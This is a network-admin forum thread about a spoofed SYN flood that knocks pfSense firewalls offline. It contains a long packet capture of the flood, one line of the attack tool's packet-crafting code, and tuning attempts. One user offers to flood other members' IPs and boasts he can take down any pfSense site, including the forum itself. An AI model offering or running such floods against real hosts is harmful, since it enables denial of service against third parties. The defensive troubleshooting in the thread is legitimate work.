    10:30:39.513403 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 48650, offset 0, flags [none], proto TCP (6), length 40)
        8.68.171.27.33870 > 80.197.144.99.80: Flags , cksum 0x11e1 (correct), seq 2228944896, win 0, length 0
    10:30:39.513408 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 26457, offset 0, flags [none], proto TCP (6), length 40)
        94.38.149.168.14235 > 80.197.144.99.80: Flags , cksum 0xf10a (correct), seq 2985623552, win 0, length 0
    10:30:39.513413 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 262, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 131.66.70.131.22774: Flags [S.], cksum 0x91bc (correct), seq 57387859, ack 862322689, win 8192, options [mss 1460], length 0
    10:30:39.513419 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 22501, offset 0, flags [none], proto TCP (6), length 40)
        195.160.175.23.11191 > 80.197.144.99.80: Flags , cksum 0x4ebf (correct), seq 3778740224, win 0, length 0
    10:30:39.513425 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 27576, offset 0, flags [none], proto TCP (6), length 40)
        223.227.192.194.46917 > 80.197.144.99.80: Flags , cksum 0x9152 (correct), seq 3844800512, win 0, length 0
    10:30:39.513441 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 43814, offset 0, flags [none], proto TCP (6), length 40)
        204.24.245.215.843 > 80.197.144.99.80: Flags , cksum 0x66a0 (correct), seq 2727215104, win 0, length 0
    10:30:39.513445 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 12500, offset 0, flags [none], proto TCP (6), length 40)
        189.41.42.152.5526 > 80.197.144.99.80: Flags , cksum 0x8104 (correct), seq 1343094784, win 0, length 0
    10:30:39.513450 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 34489, offset 0, flags [none], proto TCP (6), length 40)
        169.236.74.249.18580 > 80.197.144.99.80: Flags , cksum 0x6010 (correct), seq 819986432, win 0, length 0
    10:30:39.513455 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 35681, offset 0, flags [none], proto TCP (6), length 40)
        147.250.245.164.48820 > 80.197.144.99.80: Flags , cksum 0x729d (correct), seq 326696960, win 0, length 0
    10:30:39.513460 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 30816, offset 0, flags [none], proto TCP (6), length 40)
        193.179.137.86.23006 > 80.197.144.99.80: Flags , cksum 0x9c8a (correct), seq 2364997632, win 0, length 0
    10:30:39.513467 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 263, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 44.0.129.199.14410: Flags [S.], cksum 0xa854 (correct), seq 374786227, ack 690814977, win 8192, options [mss 1460], length 0
    10:30:39.513480 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 18975, offset 0, flags [none], proto TCP (6), length 40)
        121.19.8.238.5090 > 80.197.144.99.80: Flags , cksum 0x3603 (correct), seq 42205184, win 0, length 0
    10:30:39.513487 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 8278, offset 0, flags [none], proto TCP (6), length 40)
        216.22.210.177.33699 > 80.197.144.99.80: Flags , cksum 0xe79f (correct), seq 3093168128, win 0, length 0
    10:30:39.513492 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 8242, offset 0, flags [none], proto TCP (6), length 40)
        194.244.107.73.23806 > 80.197.144.99.80: Flags , cksum 0xcd4b (correct), seq 1977745408, win 0, length 0
    10:30:39.513497 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 26266, offset 0, flags [none], proto TCP (6), length 40)
        107.175.181.36.50561 > 80.197.144.99.80: Flags , cksum 0x5fe4 (correct), seq 2284847104, win 0, length 0
    10:30:39.513503 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 48456, offset 0, flags [none], proto TCP (6), length 40)
        57.198.49.57.38923 > 80.197.144.99.80: Flags , cksum 0x8dd6 (correct), seq 1032388608, win 0, length 0
    10:30:39.513508 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 264, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 2.198.224.97.4328: Flags [S.], cksum 0x8cf1 (correct), seq 2618298798, ack 1742536705, win 8192, options [mss 1460], length 0
    10:30:39.513524 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 10933, offset 0, flags [none], proto TCP (6), length 40)
        118.47.10.10.37511 > 80.197.144.99.80: Flags , cksum 0x77e0 (correct), seq 1137246208, win 0, length 0
    10:30:39.513530 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 18890, offset 0, flags [none], proto TCP (6), length 40)
        14.97.99.96.64512 > 80.197.144.99.80: Flags , cksum 0x444d (correct), seq 475725824, win 0, length 0
    10:30:39.513535 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 56690, offset 0, flags [none], proto TCP (6), length 40)
        213.185.151.218.28524 > 80.197.144.99.80: Flags , cksum 0x4ab7 (correct), seq 2796683264, win 0, length 0
    10:30:39.513540 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 10111, offset 0, flags [none], proto TCP (6), length 40)
        115.139.24.147.18068 > 80.197.144.99.80: Flags , cksum 0x0220 (correct), seq 4187422720, win 0, length 0
    10:30:39.513544 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 52710, offset 0, flags [none], proto TCP (6), length 40)
        71.173.24.70.9953 > 80.197.144.99.80: Flags , cksum 0x6dc6 (correct), seq 3654221824, win 0, length 0
    10:30:39.513552 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 14602, offset 0, flags [none], proto TCP (6), length 40)
        204.177.133.114.52854 > 80.197.144.99.80: Flags , cksum 0xccdc (correct), seq 3773956096, win 0, length 0
    10:30:39.513557 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 246, id 57342, offset 0, flags [none], proto TCP (6), length 40)
        193.10.116.216.4499 > 80.197.144.99.80: Flags [R.], cksum 0x62a2 (correct), seq 412614657, ack 272030576, win 8192, length 0
    10:30:39.513562 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 56996, offset 0, flags [none], proto TCP (6), length 40)
        177.149.63.251.26442 > 80.197.144.99.80: Flags , cksum 0xb4e5 (correct), seq 3232301056, win 0, length 0
    10:30:39.513566 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 15885, offset 0, flags [none], proto TCP (6), length 40)
        40.70.22.155.19703 > 80.197.144.99.80: Flags , cksum 0xdf78 (correct), seq 1662582784, win 0, length 0
    10:30:39.513572 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 32827, offset 0, flags [none], proto TCP (6), length 40)
        125.223.226.137.39765 > 80.197.144.99.80: Flags , cksum 0xd449 (correct), seq 4267769856, win 0, length 0
    10:30:39.513577 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 265, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 170.170.168.141.23827: Flags [S.], cksum 0x2af0 (correct), seq 705454965, ack 769654785, win 8192, options [mss 1460], length 0
    10:30:39.513586 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 50018, offset 0, flags [none], proto TCP (6), length 40)
        159.28.31.228.48209 > 80.197.144.99.80: Flags , cksum 0xa3a2 (correct), seq 2943680512, win 0, length 0
    10:30:39.513591 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 63898, offset 0, flags [none], proto TCP (6), length 40)
        111.154.126.162.61744 > 80.197.144.99.80: Flags , cksum 0x74ec (correct), seq 2047868928, win 0, length 0
    10:30:39.513596 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 38298, offset 0, flags [none], proto TCP (6), length 40)
        16.190.128.37.39392 > 80.197.144.99.80: Flags , cksum 0x6e4b (correct), seq 895156224, win 0, length 0
    10:30:39.513601 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 59199, offset 0, flags [none], proto TCP (6), length 40)
        89.254.93.239.54706 > 80.197.144.99.80: Flags , cksum 0x0020 (correct), seq 1084882944, win 0, length 0
    10:30:39.513606 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 49941, offset 0, flags [none], proto TCP (6), length 40)
        152.194.98.1.53241 > 80.197.144.99.80: Flags , cksum 0x89ae (correct), seq 2046689280, win 0, length 0
    10:30:39.513622 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 4695, offset 0, flags [none], proto TCP (6), length 40)
        189.190.106.217.65131 > 80.197.144.99.80: Flags , cksum 0x1ba0 (correct), seq 2345009152, win 0, length 0
    10:30:39.513651 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 12874, offset 0, flags [none], proto TCP (6), length 40)
        219.88.57.232.26546 > 80.197.144.99.80: Flags , cksum 0x0244 (correct), seq 1328742400, win 0, length 0
    10:30:39.513676 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 28154, offset 0, flags [none], proto TCP (6), length 40)
        50.153.123.61.7786 > 80.197.144.99.80: Flags , cksum 0x0193 (correct), seq 9895936, win 0, length 0
    10:30:39.513681 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 29173, offset 0, flags [none], proto TCP (6), length 40)
        145.164.64.162.49027 > 80.197.144.99.80: Flags , cksum 0x9d60 (correct), seq 2671706112, win 0, length 0
    10:30:39.513686 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 266, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 86.202.253.217.29017: Flags [S.], cksum 0xdb07 (correct), seq 719532581, ack 2559508481, win 8192, options [mss 1460], length 0


  • Banned

    I am, by the way, running stateless as a test since it doesnt have any impact running with SYN cookies enabled :)



  • After re-reading the code this morning and looking at the packet dump, it seems "tot_len" is being set and used as the IP+TCP header size.

    iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);

    No fragmented data wielding SYN packets here.



  • I've stopped a ddos on my network setting advanced rules options to limit connections per second and total states per ip.
    Then I've reduced rule blocked time.

    My link dropped from 100% to 30% during attack.



  • In this case, total states per IP won't help because they're spoofed.

    I don't see what's so special about these packets. They're all the standard 60 length IP+TCP, and 40 length IP. Both IP and TCP checksums are valid,  IP has no flags, TCP's only flag is SYN, random source ports, random Seq numbers. I must be missing something, but it looks like a normal SYN flood, but it isn't.


  • Banned

    Send me a PM with your ext. IP and pfsense behind looking at port80.

    Then I will flood it for 180 secs and then you will see how it responds.

    It just goes offline instantly…



  • I don't know, sounds like a sure-fire way to get packet-loss on my quality graph. Almost up to a week of 0 packets lost and a 1.2ms avg ping. Maybe in a few days, once I take a picture  :-)

    I don't mean 0.0% packet-loss, I mean 0 packets in actual numbers. I already have 0.0%, but there's some red on that quality graph.


  • Banned

    Chris would get back to us with testing IP but not heard anything yet.


  • Banned

    Look at the ping to the LAN side of pfSense…

    http://youtu.be/HoGQ_2sg0J0

    LAN goes offline and tries to keep going. On the test server I see maybe 25mbit of traffic and nothing that renderes it useless at all.

    Pf just dies completely. With this I can take down any site running pfSense if I want to.

    If you run Windows FW on the server with no pfSense infront, no issues.



  • FYI, your public IP is shown on your interfaces widget.

    Another FYI, I get a nice stable ping to your gateway. Nice upstream :-)

    Ping statistics for 80.x.x.x:
        Packets: Sent = 149, Received = 149, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 138ms, Maximum = 141ms, Average = 139ms

    4    15 ms    15 ms    16 ms  tengigabitethernet4-4.ar7.chi1.gblx.net [67.17.213.117]
      5  108 ms  107 ms  108 ms  4.68.110.157
      6  103 ms  103 ms  103 ms  ae-116-3502.edge3.London1.Level3.net [4.69.166.134]
      7  103 ms  103 ms  103 ms  ae-116-3502.edge3.London1.Level3.net [4.69.166.134]
      8  138 ms  138 ms  138 ms  tdcdenmark-level3-xe.london1.Level3.net [4.68.63.90]
      9  139 ms  140 ms  140 ms  ae1-0.taanqe10.dk.ip.tdc.net [83.88.22.247]
    10  140 ms  140 ms  141 ms  cpe.ae11-388.taanqe10.dk.customer.tdc.net [62.243.131.198]
    11  139 ms  139 ms  140 ms  80.x.x.x


  • Banned

    :D Its my home network so I dont care about that.

    Just removed Squid to see if it handles traffic better…

    Edit: It didnt.... :(


  • Banned

    And the forum goes down at once as well.

    Its the engine of PfSense thats the issue here. There is core functionality hit here and nothing done in the gui or elsewhere can prevent it.


  • Banned

    So what's up here? Anyone tested this on FreeBSD?


  • Banned

    Spoofed packet attacks may be used to overload the kernel route cache. A

    spoofed packet attack uses random source IPs to cause the kernel to generate

    a temporary cached route in the route table, Route cache is an extraneous

    caching layer mapping interfaces to routes to IPs and saves a lookup to the

    Forward Information Base (FIB); a routing table within the network stack. The

    IPv4 routing cache was intended to eliminate a FIB lookup and increase

    performance. While a good idea in principle, unfortunately it provided a very

    small performance boost in less than 10% of connections and opens up the

    possibility of a DoS vector. Setting rtexpire and rtminexpire to two(2)

    seconds should be sufficient to protect the route table from attack.

    http://www.es.freebsd.org/doc/handbook/securing-freebsd.html

    net.inet.ip.rtexpire=2      # (default 3600)
    net.inet.ip.rtminexpire=2    # (default 10  )
    #net.inet.ip.rtmaxcache=128  # (default 128 )

    Anybody has any comments on this because it seems to be deep within the routing stack that this occurs.



  • Just out of curiosity, why would you want to store individual IP addresses in a routing table? Isn't that the whole point subnet masks and routing tables?


  • Banned

    I dont know… its nowhere to be found in pfSense so I added it manually to get rid of it...



  • So, is there progress being made in coming up with a set of safe defaults that mitigate this attack in 2.2.1?



  • So the change helped?

    It sounds like the best thing might be to completely disable. Since that probably can't happen, I wonder if there are values smaller than 2 seconds that may be better. I could see low end boxes being much more sensitive to this issue. A lot of packets can come in a 2 second window with more and more people getting 100Mb+ connections.


  • Banned

    It didnt help. It takes this forum and store.netgate.com down as well easily.

    Throughput needs only to be about 20mbit before it dies and cant handle the traffic.

    Its no issue if you use windows firewall as the frontend and the webserver itself can easily handle the traffic both regarding backlog and overall traffic and packets.

    Its pfSense related and take it down instantly.


  • Banned

    @Supermule:

    Its pfSense related and take it down instantly.

    So it does NOT happen on FreeBSD?


  • Banned

    I havent tested it on FreeBSD.

    So I cant relate to that. You are more than welcome to provide me with a FreeBSD target on PM, so we can test.

    @doktornotor:

    @Supermule:

    Its pfSense related and take it down instantly.

    So it does NOT happen on FreeBSD?



  • @doktornotor:

    @Supermule:

    Its pfSense related and take it down instantly.

    So it does NOT happen on FreeBSD?

    I tried it on a clean freeBSD 10.1

    • it was much better than pfsense, not saying that is was 100% up, it had some packetloss as well, but no more then pfsense which instantly or mostly get 90-100% packetloss.
      It was without any tuning as well on freebsd 10.1


  • "but no more then pfsense which instantly or mostly get 90-100% packetloss"

    So was it less or more.  Same?  how much less or more?



  • @kejianshi:

    "but no more then pfsense which instantly or mostly get 90-100% packetloss"

    So was it less or more.  Same?  how much less or more?

    It really depend on the attack method. SYN-ACK or SYN-FIN, packet size etc.

    But after over 100 test i would still say pfsense could have done it better. It is not handling SYN request correctly. I don't have the skills to fix it or go deeper into it.

    Result:

    FreeBSD 10.1 = every 7-8th ping = packetloss (avg packetloss 10-20%)
    PFsense = every 1-2nd ping packetloss (avg packetloss 80-90%)

    So there is a notable difference clearly. PFsense was running stateful. Stateless helped a little bit.


  • Banned

    Anybody with serious freeBSD skills wanting to help us test this??

    Money could be involved :D



  • I wonder if getting someone from the FreeBSD forums may be useful at this point.


  • Banned

    We have had ZERO response from the pfSense guys. This is quite disturbing since we can take down any site protected by pfSense as it is.

    Right now its better to run without pf at all and rely on windows Firewall on VM's and let pf handle the routing. Only way to survive the attacks as it is.

    Thinking og getting my old ISA2006 online again to test and see how it behaves.


  • Banned

    A little more…

    http://youtu.be/boa7bbeKRG0

    Now we can limit the states that is created but basic routing is not working....still.



  • youtu huh?